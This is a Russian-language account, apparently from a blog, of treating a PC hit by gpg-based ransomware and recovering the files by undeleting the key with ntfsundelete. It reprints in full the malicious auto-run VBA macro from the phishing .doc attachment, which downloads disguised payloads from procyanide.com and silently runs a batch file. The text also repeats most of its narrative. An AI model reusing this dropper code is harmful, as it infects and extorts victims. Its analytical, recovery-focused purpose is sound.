Сегодня ко мне обратились с просьбой помочь в лечение компьютера после заражения. Я хочу рассказать, как мне удалось расшифровать файлы.
Из исходных данных было письмо, с которого началось заражение и жесткий диск компьютера. Письмо пришло с адреса exin-mihail@ya***x.ru. В письме было вложение с расширением doc. Файл содержал инструкцию как включить макрос и сам скрипт.
Скачал файлы по ссылкам из скрипта, это был бинарник gpg, офисный документ и скрипт.
Открыв сразу скрипт и пролистав его до конца увидел письмо от автора. Посыл был простой, файлы зашифрованы для разблокировки зайдите на сайт restoredz4xpmuqr.onion и следуйте инструкциям. Сайт работал и авторизация была возможна по ключу или связке логин-пароль.
Монтирую диск и на рабочем столе пользователя нахожу файл (vault.key) необходимый для авторизации.
Личный кабинет работает и даже отображает реальную информацию(количество найденных файлов для шифрования и имя компьютера). На скриншотах я все это стер. Цена за восстановление была ~500$.
Снова решил открыть скрипт и изучить его детально.
Скрипт оказался простой и в нем была строчка с генерацией ключа и его именем. Раз его создали, значит можно и найти.
В списке нахожу нужный файл и восстанавливаю.
В дальнейшем расшифровал все файлы с помощью этого ключа.
Из исходных данных было письмо, с которого началось заражение и жесткий диск компьютера. Письмо пришло с адреса exin-mihail@ya***x.ru. В письме было вложение с расширением doc. Файл содержал инструкцию как включить макрос и сам скрипт.
Содержание файла
Макрос
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub Document_Open()
On Error Resume Next
Dim x1
Set x1 = CreateObject("WScript.Shell")
doc = "%TEMP%\\document.doc"
doc = x1.ExpandEnvironmentStrings(doc)
Dim xHttp: Set xHttp = CreateObject("microsoft.xmlhttp")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "procyanide.com/document.css", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile doc, 1
End With
x1.Run doc, 1, 0
Dim x2
Set x2 = CreateObject("WScript.Shell")
vlt = "%TEMP%\\gpg.css"
vlt = x2.ExpandEnvironmentStrings(vlt)
Dim xHttp2: Set xHttp2 = CreateObject("microsoft.xmlhttp")
Dim bStrm2: Set bStrm2 = CreateObject("Adodb.Stream")
xHttp2.Open "GET", "procyanide.com/gpg.css", False
xHttp2.Send
With bStrm2
.Type = 1
.Open
.write xHttp2.responseBody
.savetofile vlt, 1
End With
Dim x3
Set x3 = CreateObject("WScript.Shell")
cmd = "%TEMP%\\onuqqa.bat"
cmd = x3.ExpandEnvironmentStrings(cmd)
Dim xHttp3: Set xHttp3 = CreateObject("microsoft.xmlhttp")
Dim bStrm3: Set bStrm3 = CreateObject("Adodb.Stream")
xHttp3.Open "GET", "procyanide.com/vault.css", False
xHttp3.Send
With bStrm3
.Type = 1
.Open
.write xHttp3.responseBody
.savetofile cmd, 1
End With
x3.Run cmd, 0, 0
End Sub
Скачал файлы по ссылкам из скрипта, это был бинарник gpg, офисный документ и скрипт.
Открыв сразу скрипт и пролистав его до конца увидел письмо от автора. Посыл был простой, файлы зашифрованы для разблокировки зайдите на сайт restoredz4xpmuqr.onion и следуйте инструкциям. Сайт работал и авторизация была возможна по ключу или связке логин-пароль.
Монтирую диск и на рабочем столе пользователя нахожу файл (vault.key) необходимый для авторизации.
Личный кабинет работает и даже отображает реальную информацию(количество найденных файлов для шифрования и имя компьютера). На скриншотах я все это стер. Цена за восстановление была ~500$.
Личный кабинет
У них и инструкция есть
Снова решил открыть скрипт и изучить его детально.
Скрипт оказался простой и в нем была строчка с генерацией ключа и его именем. Раз его создали, значит можно и найти.
Запустил восстановление файлов
sudo ntfsundelete -p 100 /dev/sdc1 -t 2d
В списке нахожу нужный файл и восстанавливаю.
В дальнейшем расшифровал все файлы с помощью этого ключа.